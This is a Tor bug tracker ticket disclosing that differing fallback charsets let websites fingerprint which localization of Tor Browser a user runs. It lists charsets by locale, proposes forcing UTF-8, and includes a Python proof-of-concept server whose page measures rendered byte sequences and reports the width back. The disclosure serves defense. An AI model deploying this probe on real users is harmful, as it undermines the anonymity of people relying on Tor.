[tor-bugs] #10703 [TorBrowserButton]: Fallback charset enables fingerprinting of bundle localization
#10703: Fallback charset enables fingerprinting of bundle localization
------------------------------+---------------------------
Reporter: dcf | Owner: mikeperry
Type: defect | Status: new
Priority: normal | Milestone:
Component: TorBrowserButton | Version:
Keywords: tbb-fingerprints | Actual Points:
Parent ID: | Points:
------------------------------+---------------------------
Torbutton has the `spoof_english` pref that changes the value of the
`Accept-Language` header to `en-us,en;q=0.5`; this cloaks what particular
localized bundle you may be using. But localized bundles still differ in
their default (fallback) charset. By figuring out what characters a byte
sequence decodes as, it's possible to find out what charset is in use.
The attack goes like this. The web server sends an HTML page with no
declared charset, neither in the HTTP header (`Content-Type`) nor in the
HTML (`<meta charset=...>`). The HTML contains one or more byte sequences
that stand for different characters in different charsets. JavaScript in
the HTML measures the size of the rendered characters. By including a few
different byte sequences, it's probably possible to fingerprint all the
possible TBB localizations.
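A minimal sketch of the server side of this attack, in Python. It is only an illustration: the probe bytes, the `/report` endpoint, the element id, and the function names are all assumptions, and it has not been tested against a real bundle. The point is that no charset is declared anywhere and the raw bytes are sent unmodified.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical probe: any byte sequence that decodes differently per charset.
PROBE = b"\xc3\xa3"


def build_probe_page(probe: bytes = PROBE) -> bytes:
    """Build an HTML body that declares no encoding and embeds raw probe bytes."""
    head = (
        b"<!DOCTYPE html>\n<html><head><title>probe</title></head><body>\n"
        b'<span id="probe">'
    )
    tail = (
        b"</span>\n<script>\n"
        b"// The rendered width depends on which characters the bytes became.\n"
        b"var w = document.getElementById('probe').offsetWidth;\n"
        b"new Image().src = '/report?w=' + w;  // hypothetical reporting endpoint\n"
        b"</script>\n</body></html>\n"
    )
    return head + probe + tail


class ProbeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith("/report"):
            # The measurement arrives in the query string; just acknowledge it.
            self.send_response(204)
            self.end_headers()
            return
        body = build_probe_page()
        self.send_response(200)
        # Deliberately no "; charset=..." parameter, so the browser falls back.
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port: int = 8000) -> None:
    """Run the probe server on localhost (not called automatically)."""
    HTTPServer(("127.0.0.1", port), ProbeHandler).serve_forever()
```

Calling `serve()` and loading `http://127.0.0.1:8000/` in differently localized bundles should, if the attack works as described, produce different `w` values in the request log.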
It looks like our current bundles may come with any of 6 different default
charsets:
* [https://en.wikipedia.org/wiki/UTF-8 utf-8]: ar fa
* [https://en.wikipedia.org/wiki/ISO/IEC_8859-1 iso-8859-1]: de es-ES fr
it nl pt-PT vi
* [https://en.wikipedia.org/wiki/ISO/IEC_8859-2 iso-8859-2]: pl
* [https://en.wikipedia.org/wiki/Windows-1251 windows-1251]: ru
* [https://en.wikipedia.org/wiki/EUC-KR#EUC-KR euc-kr]: ko
* [https://en.wikipedia.org/wiki/GBK gbk]: zh
I found these by grepping the langpacks' unpacked `*.xpi` files for
"[http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries#Intl.
intl.charset.default]".
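The search can be sketched in Python roughly as follows. This assumes the langpacks have already been unpacked into a directory tree and that the pref appears as a `key=value` line in some file; the function name and the regular expression are illustrative, not the exact command used.

```python
import os
import re

# Matches a line such as "intl.charset.default=ISO-8859-1" (assumed format).
PREF_RE = re.compile(r"^\s*intl\.charset\.default\s*=\s*(\S+)", re.MULTILINE)


def find_default_charsets(root):
    """Walk root and map each file that sets the pref to the value it sets."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file; skip it
            match = PREF_RE.search(text)
            if match:
                found[path] = match.group(1)
    return found
```

Running `find_default_charsets("langpacks/")` on a directory of unpacked langpacks (the path is a placeholder) returns one entry per file that defines the pref.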
As an example of how byte sequences can be variously decoded, here are
decodings of "\xc3\xa3":
 * utf-8: ã
 * iso-8859-1: Ã£
 * iso-8859-2: ĂŁ
 * windows-1251: ГЈ
 * euc-kr: 찾
 * gbk: 茫
That is, an HTML page can contain the sequence "\xc3\xa3" and it will
render as different characters depending on the charset in effect.
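The decodings can be reproduced with a short Python sketch. Note the assumption: Python's codecs stand in for the browser's decoders here, and the two are not guaranteed to agree for every byte (browsers, for instance, treat the `iso-8859-1` label as windows-1252), although they agree for these two bytes.

```python
PROBE = b"\xc3\xa3"

# The six fallback charsets listed above, by their Python codec names.
CHARSETS = ["utf-8", "iso-8859-1", "iso-8859-2", "windows-1251", "euc-kr", "gbk"]


def decode_all(data, charsets=CHARSETS):
    """Decode the same bytes under each charset and return {charset: text}."""
    return {cs: data.decode(cs, errors="replace") for cs in charsets}


decodings = decode_all(PROBE)
for charset, text in decodings.items():
    print(f"{charset:>12}: {text!r} ({len(text)} character(s))")
```

Because each charset yields a different string, and the multi-byte charsets yield one character where the single-byte ones yield two, a single probe is already enough to tell these six apart in principle.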
A possible solution is just to force intl.charset.default to UTF-8 in all
localizations. Here are some Mozilla bugs I found that are relevant to
setting this pref to UTF-8:
[https://bugzilla.mozilla.org/show_bug.cgi?id=910165 910165]
[https://bugzilla.mozilla.org/show_bug.cgi?id=406498 406498]
[https://bugzilla.mozilla.org/show_bug.cgi?id=536506 536506]
[https://bugzilla.mozilla.org/show_bug.cgi?id=910169 910169].
 Also see
 https://developer.mozilla.org/en-US/docs/Localizations_and_character_encodings#Specifying_the_fallback_encoding,
which indicates that Firefox's behavior with respect to the fallback
charset will change:
> As of Firefox 28, this section is obsolete, since the preference
intl.charset.default no longer exists. The mapping from locales onto
fallback encodings is now built into Gecko itself.
In the best case, this could be interpreted to mean that the
`spoof_english` setting will become sufficient, and the fallback will
become as it would be for en-US. Or it might just mean that the preference
is moved to somewhere inside Gecko. It seems the relevant bug is
[https://bugzilla.mozilla.org/show_bug.cgi?id=910192 910192: Get rid of
intl.charset.default as a localizable pref and deduce the fallback...].
--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/10703>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online